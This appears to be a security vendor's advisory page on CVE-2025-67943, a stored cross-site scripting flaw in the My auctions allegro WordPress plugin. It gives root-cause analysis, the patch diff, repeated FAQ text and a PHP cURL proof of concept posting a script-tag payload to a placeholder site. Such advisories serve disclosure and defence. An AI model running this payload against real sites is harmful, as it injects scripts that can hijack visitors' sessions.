What is CVE-2025-67943?

CVE-2025-67943 is a high-severity vulnerability in the My auctions allegro plugin for WordPress. It allows unauthenticated stored Cross-Site Scripting (XSS) due to insufficient input sanitization, enabling attackers to inject malicious scripts that execute when users access affected pages.

How does the vulnerability work?

The vulnerability arises from the plugin’s `getParam` method, which fails to properly sanitize user input. Attackers can send crafted requests with malicious scripts that are stored and later rendered unsanitized, executing in the context of any user viewing the page.

Who is affected by this vulnerability?

Any WordPress site using the My auctions allegro plugin version 3.6.32 or earlier is affected. Site administrators should check their plugin version to determine if they are at risk of exploitation.

How can I check if my site is vulnerable?

To check if your site is vulnerable, navigate to the Plugins section in your WordPress admin dashboard. Look for the My auctions allegro plugin and verify if the version is 3.6.32 or earlier.

How can I fix this vulnerability?

The vulnerability is patched in version 3.6.33 of the My auctions allegro plugin. Update the plugin to this version or later to mitigate the risk of exploitation.

What if I cannot update the plugin immediately?

If immediate updating is not possible, consider disabling the plugin until an update can be applied. Additionally, restrict access to the site or implement a Web Application Firewall (WAF) to help filter out malicious requests.

What does the CVSS score of 7.2 indicate?

A CVSS score of 7.2 indicates a high severity vulnerability. This means that successful exploitation could lead to significant consequences, including data theft, session hijacking, or unauthorized actions performed on behalf of users.

What is stored Cross-Site Scripting (XSS)?

Stored XSS occurs when an attacker injects a script into a web application that is then stored on the server. When users access the affected content, the script executes in their browsers, potentially compromising their data and security.

How does the proof of concept demonstrate the vulnerability?

The proof of concept shows how an attacker can send a crafted request to a vulnerable endpoint, injecting a simple JavaScript alert. This illustrates the potential for executing arbitrary scripts in the context of a user’s session, demonstrating the risk associated with the vulnerability.

What are the potential consequences of exploitation?

Exploitation of this vulnerability can lead to various malicious activities, such as session hijacking, unauthorized administrative actions, or defacement of the website. Attackers can manipulate user sessions, compromising the integrity and confidentiality of user data.

What additional security measures can I take?

In addition to updating the plugin, consider implementing security best practices such as regular vulnerability assessments, using security plugins, and maintaining up-to-date backups. Educate users about phishing and social engineering attacks to further enhance security.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-67943: My auctions allegro <= 3.6.32 – Unauthenticated Stored Cross-Site Scripting (my-auctions-allegro-free-edition)

CVE ID CVE-2025-67943

Plugin my-auctions-allegro-free-edition

Severity High (CVSS 7.2)

CWE 79

Vulnerable Version 3.6.32

Patched Version 3.6.33

Disclosed January 18, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-67943:
This vulnerability is an unauthenticated stored Cross-Site Scripting (XSS) flaw in the My auctions allegro WordPress plugin. The issue affects the plugin’s core controller component, allowing attackers to inject malicious scripts that execute when a user views a compromised page. The CVSS score of 7.2 indicates a high severity.

Atomic Edge research identifies the root cause as insufficient input sanitization in the `getParam` method within the file `/my-auctions-allegro-free-edition/core/controller.php`. The vulnerable version, 3.6.32, only applied the `esc_sql()` function to user-supplied parameters retrieved from `$_REQUEST`. This function is designed for SQL escaping and does not neutralize HTML or JavaScript characters, leaving the output vulnerable to XSS when the parameter value is later echoed to the browser without proper output escaping.

Exploitation occurs via an HTTP request to any plugin endpoint that calls the `getParam` method. An attacker can send a crafted request containing a malicious payload in any parameter processed by this method. For example, a GET or POST request to a plugin page with a parameter like `id=alert(document.cookie)` would be accepted. The payload would be stored and later rendered unsanitized, executing the script in the victim’s browser context.

The patch modifies the `getParam` method in `/my-auctions-allegro-free-edition/core/controller.php`. It adds `sanitize_text_field()` to the return statement, so the line becomes `return ! isset ( $_REQUEST [$param] ) ? null : sanitize_text_field(esc_sql($_REQUEST [$param]));`. The `sanitize_text_field()` WordPress function strips invalid UTF-8 characters, removes extra whitespace, and sanitizes HTML tags, effectively neutralizing XSS payloads. The patch also includes hardening in `functions.php` to block certain characters in instance names and secures an SQL query in `auctions.php`.

Successful exploitation allows an unauthenticated attacker to inject arbitrary JavaScript into pages served by the plugin. This script executes in the context of any user viewing the infected page, potentially leading to session hijacking, administrative actions performed on behalf of the user, or defacement of the site.

Differential between vulnerable and patched code

Code Diff

--- a/my-auctions-allegro-free-edition/core/controller.php
+++ b/my-auctions-allegro-free-edition/core/controller.php
@@ -123,7 +123,7 @@
 		return $this->buttons;
 	}
 	public function getParam($param) {
-		return ! isset ( $_REQUEST [$param] ) ? null : esc_sql($_REQUEST [$param]);
+		return ! isset ( $_REQUEST [$param] ) ? null : sanitize_text_field(esc_sql($_REQUEST [$param]));
 	}
 	public function getParams() {
         $request = $_REQUEST;
--- a/my-auctions-allegro-free-edition/core/functions.php
+++ b/my-auctions-allegro-free-edition/core/functions.php
@@ -173,6 +173,10 @@
      */
     public static function getInstance($instance, $type = 'Model', $rec = false)
     {
+        if (strpos($instance, '-') !== false || strpos($instance, '.') !== false || strpos($instance, '/') !== false) {
+            return false;
+        }
+
         $className = call_user_func_array(self::$defaultClass . '::parseToClass', [$instance, $type]);
         $path      = call_user_func_array(self::$defaultClass . '::parseToFile', [$instance, $type]);

--- a/my-auctions-allegro-free-edition/my-auctions-allegro-free-edition.php
+++ b/my-auctions-allegro-free-edition/my-auctions-allegro-free-edition.php
@@ -2,7 +2,7 @@
 /*
  * Plugin Name: My auctions allegro
  * Plugin URI: https://wordpress.org/plugins/my-auctions-allegro-free-edition
- * Version: 3.6.32
+ * Version: 3.6.33
  * Description: Plug-in display auctions from popular polish auction website called allegro.pl, also from 1.7 version you can import basic information from auctions to WooCommerce
  * Author: WPHocus
  * Author URI: https://wphocus.com
--- a/my-auctions-allegro-free-edition/src/model/auctions.php
+++ b/my-auctions-allegro-free-edition/src/model/auctions.php
@@ -333,7 +333,7 @@
         $set    = $column . ' = ' . $column . ' + 1';
         $where  = sprintf('auction_id = %s AND auction_profile_id = %d', $auctionId, $profileId);

-        $this->getWpdb()->query(sprintf("UPDATE %s SET %s WHERE %s", $this->getTable(), $set, $where));
+        $this->getWpdb()->query($this->getWpdb()->prepare("UPDATE %s SET %s WHERE %s", $this->getTable(), $set, $where));
     }

     public function getMostPopularAuctions($count)

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-67943 - My auctions allegro <= 3.6.32 - Unauthenticated Stored Cross-Site Scripting
<?php
// Configure the target WordPress site URL
$target_url = 'http://target-site.com/';

// Identify a page or endpoint that uses the vulnerable plugin.
// The exact endpoint is plugin-dependent, but the attack vector is any parameter via GET or POST.
// This example targets a frontend shortcode page, using a POST request to simulate form interaction.
$exploit_url = $target_url . '?page_with_plugin_shortcode=1';

// Malicious payload to inject. This is a basic proof-of-concept alert.
$payload = '<script>alert("Atomic Edge XSS Test");</script>';

// Parameter name to attack. This must be a parameter the plugin's getParam method processes.
// The exact parameter name requires reconnaissance; 'id' or 'profile' are common examples.
$parameter = 'id';

// Initialize cURL session
$ch = curl_init();

// Set the target URL
curl_setopt($ch, CURLOPT_URL, $exploit_url);

// Use POST method and send the malicious payload in the specified parameter
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([$parameter => $payload]));

// Capture the response for analysis
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

// Execute the request
$response = curl_exec($ch);

// Check for errors
if (curl_errno($ch)) {
    echo 'cURL Error: ' . curl_error($ch);
} else {
    // A successful request indicates the payload was likely accepted.
    // Verification requires visiting the injected page and observing script execution.
    echo "Payload sent. Check the target page for script execution.n";
    echo "HTTP Code: " . curl_getinfo($ch, CURLINFO_HTTP_CODE) . "n";
}

// Close cURL session
curl_close($ch);
?>

Frequently Asked Questions

What is CVE-2025-67943?
Understanding the vulnerability
CVE-2025-67943 is a high-severity vulnerability in the My auctions allegro plugin for WordPress. It allows unauthenticated stored Cross-Site Scripting (XSS) due to insufficient input sanitization, enabling attackers to inject malicious scripts that execute when users access affected pages.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from the plugin’s `getParam` method, which fails to properly sanitize user input. Attackers can send crafted requests with malicious scripts that are stored and later rendered unsanitized, executing in the context of any user viewing the page.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the My auctions allegro plugin version 3.6.32 or earlier is affected. Site administrators should check their plugin version to determine if they are at risk of exploitation.
How can I check if my site is vulnerable?
Version verification process
To check if your site is vulnerable, navigate to the Plugins section in your WordPress admin dashboard. Look for the My auctions allegro plugin and verify if the version is 3.6.32 or earlier.
How can I fix this vulnerability?
Updating the plugin
The vulnerability is patched in version 3.6.33 of the My auctions allegro plugin. Update the plugin to this version or later to mitigate the risk of exploitation.
What if I cannot update the plugin immediately?
Mitigation strategies
If immediate updating is not possible, consider disabling the plugin until an update can be applied. Additionally, restrict access to the site or implement a Web Application Firewall (WAF) to help filter out malicious requests.
What does the CVSS score of 7.2 indicate?
Understanding risk levels
A CVSS score of 7.2 indicates a high severity vulnerability. This means that successful exploitation could lead to significant consequences, including data theft, session hijacking, or unauthorized actions performed on behalf of users.
What is stored Cross-Site Scripting (XSS)?
Defining the attack vector
Stored XSS occurs when an attacker injects a script into a web application that is then stored on the server. When users access the affected content, the script executes in their browsers, potentially compromising their data and security.
How does the proof of concept demonstrate the vulnerability?
Exploit illustration
The proof of concept shows how an attacker can send a crafted request to a vulnerable endpoint, injecting a simple JavaScript alert. This illustrates the potential for executing arbitrary scripts in the context of a user’s session, demonstrating the risk associated with the vulnerability.
What are the potential consequences of exploitation?
Impact assessment
Exploitation of this vulnerability can lead to various malicious activities, such as session hijacking, unauthorized administrative actions, or defacement of the website. Attackers can manipulate user sessions, compromising the integrity and confidentiality of user data.
What additional security measures can I take?
Enhancing site security
In addition to updating the plugin, consider implementing security best practices such as regular vulnerability assessments, using security plugins, and maintaining up-to-date backups. Educate users about phishing and social engineering attacks to further enhance security.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations